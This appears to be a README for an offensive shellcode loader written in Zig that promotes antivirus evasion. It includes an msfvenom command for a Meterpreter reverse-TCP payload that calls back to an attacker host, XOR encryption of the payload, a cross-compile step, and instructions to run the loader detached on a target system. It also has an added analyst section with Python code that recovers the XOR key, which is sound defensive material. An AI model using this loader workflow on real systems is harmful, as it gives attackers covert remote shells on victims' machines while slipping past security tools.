A proof-of-concept shellcode loader demonstrating advanced evasion techniques for security research. Features external payload loading, process detachment, and multi-byte XOR encryption.
- External Payload Loading - Separates loader from encrypted shellcode
- Process Detachment - Spawns independent background process
- Multi-byte XOR - 8-byte rotating key encryption
- Memory Protection - RW → RX transition (avoids RWX)
- Cross-compilation - Build Windows binaries from Linux
- Zig 0.13.0+
- Python 3.6+
```shell
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<LHOST> LPORT=<PORT> -f raw -o shellcode.bin
$ python3 shellcode_encrypter.py shellcode.bin
```
Output: data.bin (encrypted payload)
```shell
$ zig build-exe zig_loader.zig -target x86_64-windows -O ReleaseSmall -fstrip -fsingle-threaded
```
Transfer both zig_loader.exe and data.bin to the target system:
```powershell
PS C:\> .\zig_loader.exe
```
The loader detaches immediately, returning control to the shell while maintaining the connection in the background.
loader.exe (clean binary)
↓
Reads data.bin (encrypted)
↓
XOR decryption
↓
VirtualAlloc (RW)
↓
Copy shellcode
↓
VirtualProtect (RX)
↓
CreateProcess (detached)
↓
CreateThread → Execute
Modify the key in both files:
shellcode_encrypter.py:
```python
xor_key = [0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0]
```
zig_loader.zig:
```zig
const xor_key = [_]u8{ 0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0 };
```
This tool demonstrates:
- Shellcode execution techniques
- AV evasion methodologies
- Process manipulation
- Memory management
Intended for:
- Security research
- Authorized penetration testing
- CTF competitions
- Malware analysis training
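For the malware analysis training use listed above, the following added example (not the project's shellcode_encrypter.py, and not part of the original README) shows what the 8-byte rotating XOR scheme does to a payload and why it gives an analyst an easy way in: the same function encrypts and decrypts, a few bytes of known plaintext at offset 0 yield the key directly, and any key-aligned run of null padding in the payload is emitted as the key itself. The key value is the one shown in the README; the payload bytes are a constructed stand-in, not shellcode.

```python
from collections import Counter
from itertools import cycle

# The README's example 8-byte rotating key (the value is on the page; this
# script is an added analysis example, not the project's own code).
XOR_KEY = bytes([0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0])

# Constructed sample standing in for shellcode.bin: a short header, 40 distinct
# bytes, a run of null padding, and a trailer. It is not shellcode.
SAMPLE_PAYLOAD = b"HDR1" + bytes(range(40)) + b"\x00" * 64 + b"tail"


def xor_rotate(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: byte i is XORed with key[i % len(key)].
    XOR is its own inverse, so one function both encrypts and decrypts."""
    if not key:
        raise ValueError("key must be non-empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key_from_known_prefix(ciphertext: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """Analyst step: if the first key_len plaintext bytes are known (an
    unencrypted copy, a fixed header), XORing them against the ciphertext
    gives the key directly."""
    if len(known_prefix) < key_len or len(ciphertext) < key_len:
        raise ValueError("need at least key_len bytes of plaintext and ciphertext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_prefix[:key_len]))


def most_common_aligned_block(ciphertext: bytes, key_len: int) -> bytes:
    """Analyst heuristic: a key-aligned run of zero bytes in the plaintext is
    emitted unchanged as the key, so when the payload contains null padding
    the most frequent key-aligned ciphertext block is a strong key candidate."""
    if key_len <= 0 or len(ciphertext) < key_len:
        raise ValueError("ciphertext shorter than key_len")
    blocks = (ciphertext[i:i + key_len]
              for i in range(0, len(ciphertext) - key_len + 1, key_len))
    return Counter(blocks).most_common(1)[0][0]


def demo() -> dict:
    """Encrypt the constructed sample, recover the key both ways, decrypt."""
    encrypted = xor_rotate(SAMPLE_PAYLOAD, XOR_KEY)
    key_from_prefix = recover_key_from_known_prefix(encrypted, SAMPLE_PAYLOAD[:8], len(XOR_KEY))
    key_from_padding = most_common_aligned_block(encrypted, len(XOR_KEY))
    return {
        "roundtrip_ok": xor_rotate(encrypted, XOR_KEY) == SAMPLE_PAYLOAD,
        "known_prefix_key": key_from_prefix,
        "null_padding_key": key_from_padding,
        "decrypted_with_guess": xor_rotate(encrypted, key_from_padding),
    }


if __name__ == "__main__":
    result = demo()
    print("round trip ok:", result["roundtrip_ok"])
    print("key from known prefix:", result["known_prefix_key"].hex())
    print("key from null padding:", result["null_padding_key"].hex())
```

The null-padding heuristic is the practical point for an analyst: because the key repeats every 8 bytes and XOR with zero is the identity, a captured data.bin often carries its own key in plain sight, and once recovered the decrypted payload can be scanned and attributed with the usual tooling.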
FOR AUTHORIZED USE ONLY
This tool is provided for educational and legitimate security testing purposes. Unauthorized access to computer systems is illegal. Users must obtain explicit written authorization before use. The authors assume no liability for misuse.
MIT License - See LICENSE file for details